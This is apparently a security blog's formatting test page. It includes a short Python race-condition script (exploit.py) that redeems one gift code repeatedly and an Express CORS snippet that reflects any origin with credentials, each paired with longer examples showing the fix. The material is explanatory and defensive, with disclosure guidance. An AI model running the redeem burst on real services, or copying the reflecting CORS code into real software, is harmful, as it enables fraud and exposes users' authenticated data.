Style Guide: What This Blog Can Render


This post is a living reference for every formatting feature this blog supports. I use it to test rendering after changes and as a quick lookup when writing new posts.

Code Blocks

Syntax-highlighted code with a file title:

exploit.py
import httpx
import asyncio
 
async def race_condition(target: str, token: str):
    """Send parallel requests to exploit a TOCTOU window."""
    async with httpx.AsyncClient() as client:
        tasks = [
            client.post(
                f"{target}/api/redeem",
                json={"code": token},
            )
            for _ in range(20)
        ]
        results = await asyncio.gather(*tasks)
        succeeded = [r for r in results if r.status_code == 200]
        print(f"Redeemed {len(succeeded)} times (expected: 1)")
 
asyncio.run(race_condition("https://target.example", "GIFT-1234"))
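The exploit above only works when the server checks whether a code is redeemed and then marks it redeemed in two separate steps, with a gap in between that a second request can slip into. The following is an added example, not code from this post or from any real backend: it models that gap with an in-memory store whose every accessor awaits once (standing in for a database round trip), runs the same 20-way burst the exploit sends against a check-then-act handler and against an atomic test-and-set handler, and counts the 200s. The store, the handler names and the gift code are all assumptions made for the example.

```python
import asyncio


class AsyncStore:
    """Constructed stand-in for the database behind /api/redeem.

    Every accessor awaits once to model a network round trip, which is
    exactly where another request can interleave. Assumed for this example;
    the post never shows the server side.
    """

    def __init__(self, codes):
        self._redeemed = {code: False for code in codes}

    def has_code(self, code: str) -> bool:
        return code in self._redeemed

    async def is_redeemed(self, code: str) -> bool:
        await asyncio.sleep(0)  # yield to the loop, like waiting on the DB
        return self._redeemed[code]

    async def mark_redeemed(self, code: str) -> None:
        await asyncio.sleep(0)
        self._redeemed[code] = True

    async def claim(self, code: str) -> bool:
        """Atomic test-and-set.

        The round trip happens before the check; between the check and the
        write there is no await, so no other coroutine can run. A real
        backend gets the same property from
        UPDATE codes SET redeemed = true WHERE code = ? AND redeemed = false
        and treating "zero rows affected" as "already redeemed".
        """
        await asyncio.sleep(0)
        if self._redeemed.get(code) is False:
            self._redeemed[code] = True
            return True
        return False


async def redeem_vulnerable(store: AsyncStore, code: str) -> int:
    """Check, then act. The await between the two is the TOCTOU window."""
    if not store.has_code(code):
        return 404
    if await store.is_redeemed(code):
        return 409
    await store.mark_redeemed(code)  # every request that passed the check lands here
    return 200


async def redeem_fixed(store: AsyncStore, code: str) -> int:
    """Single atomic step: the check and the write cannot be separated."""
    if not store.has_code(code):
        return 404
    return 200 if await store.claim(code) else 409


async def _fire(handler, store, code, n):
    """Mirror the exploit above: n parallel requests for the same code."""
    statuses = await asyncio.gather(*(handler(store, code) for _ in range(n)))
    return sum(1 for s in statuses if s == 200)


def count_redemptions(handler, n: int = 20) -> int:
    """Run n concurrent redeem calls against a fresh store holding one valid
    code and return how many of them succeeded with 200."""
    store = AsyncStore(["GIFT-1234"])
    return asyncio.run(_fire(handler, store, "GIFT-1234", n))


def redeem_status(handler, code: str) -> int:
    """Single request against a fresh store, for the non-racy paths."""
    return asyncio.run(handler(AsyncStore(["GIFT-1234"]), code))


if __name__ == "__main__":
    print("vulnerable:", count_redemptions(redeem_vulnerable), "redemptions (expected: 1)")
    print("fixed:     ", count_redemptions(redeem_fixed), "redemption")
```

The interleaving is deterministic here because asyncio runs the 20 coroutines round-robin: all of them read "not redeemed" before any of them writes. With real threads or processes the window is a matter of timing, which is why the exploit fires 20 requests rather than two; the fix is the same either way, one atomic operation that both tests and sets.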

Inline code: process.env.SECRET_KEY or x-forwarded-for.

Highlighted Lines

Draw attention to specific lines:

app.use((req, res, next) => {
  const origin = req.headers.origin;
  // These two lines are the vulnerability:
  res.setHeader("Access-Control-Allow-Origin", origin);
  res.setHeader("Access-Control-Allow-Credentials", "true");
  next();
});
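Reflecting the request's Origin while also sending Allow-Credentials lets any page on the web read authenticated responses from this API. As an added example (not code from this post, and written in Python rather than the Express above so it runs stand-alone), the block below puts that reflecting policy next to a suffix-matching "fix" that is still bypassable and next to an exact-match allowlist, then evaluates each the way a browser does before releasing a credentialed response. The allowlist entries and probe origins are constructed for the example.

```python
# Origins this API trusts, as exact strings. Constructed for this example;
# the Express snippet above has no such list, it trusts every Origin.
ALLOWED_ORIGINS = frozenset({
    "https://app.target.example",
    "https://admin.target.example",
})


def cors_reflect(origin):
    """The post's vulnerable policy: echo whatever Origin arrived and add
    credentials. Any site can now read authenticated responses."""
    if origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_suffix_match(origin):
    """A common "fix" that is still broken: accept any Origin that ends with
    the trusted domain. An attacker-registered eviltarget.example passes."""
    if origin is None or not origin.endswith("target.example"):
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_allowlist(origin):
    """Exact match against the allowlist. Exact comparison also rejects
    "null", prefix tricks such as https://app.target.example.attacker.example
    and scheme downgrades to http://. Vary: Origin is sent either way so a
    shared cache never serves one origin's response to another."""
    headers = {"Vary": "Origin"}
    if origin in ALLOWED_ORIGINS:
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def allows_credentialed_read(headers, origin):
    """What the browser checks before handing a credentialed response to the
    page at `origin`: ACAO must equal the origin exactly (a wildcard is not
    accepted with credentials) and ACAC must be the string "true"."""
    return (
        headers.get("Access-Control-Allow-Origin") == origin
        and headers.get("Access-Control-Allow-Credentials") == "true"
    )


if __name__ == "__main__":
    probes = [
        "https://app.target.example",                   # legitimate front end
        "https://eviltarget.example",                   # suffix-match bypass
        "https://app.target.example.attacker.example",  # prefix-match bypass
        "https://attacker.example",
    ]
    for policy in (cors_reflect, cors_suffix_match, cors_allowlist):
        readable = [o for o in probes if allows_credentialed_read(policy(o), o)]
        print(f"{policy.__name__:18} grants: {readable}")
```

The point of the suffix-match case is that string containment is not origin equality: anything short of comparing the whole scheme://host[:port] triple against a fixed set leaves a registrable domain the attacker can buy. If the API must serve many tenants, compute the allowlist from configuration, not from the request.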

Callouts

[INFO]

Informational: helpful context or background.

[WARN]

Warning: the technique described can be destructive in production.

[CRIT]

Danger: do not run this against systems you don't own.

Tables

Method   Endpoint         Auth
GET      /api/users       Bearer token
POST     /api/users       Admin only
DELETE   /api/users/:id   Admin only

Footnotes

Security research often needs citations [1] and asides [2].

Blockquotes

The most dangerous bugs aren't the ones that crash your program. They're the ones that silently do the wrong thing.

Task Lists

  • Reproduce the vulnerability
  • Document the attack surface
  • Write the vendor notification
  • Coordinate disclosure timeline

Lists and Emphasis

A few ground rules for responsible disclosure:

  1. Always get authorization before testing
  2. Document everything: timestamps, requests, responses
  3. Report through official channels, not Twitter
  4. Give vendors reasonable time to patch

Some resources I reference often:


This post gets updated as I add new rendering features. If something looks off, that's a bug. Let me know.

Footnotes

  1. Like this one: a reference to supporting material.

  2. Or this: a tangential thought that would break the flow inline.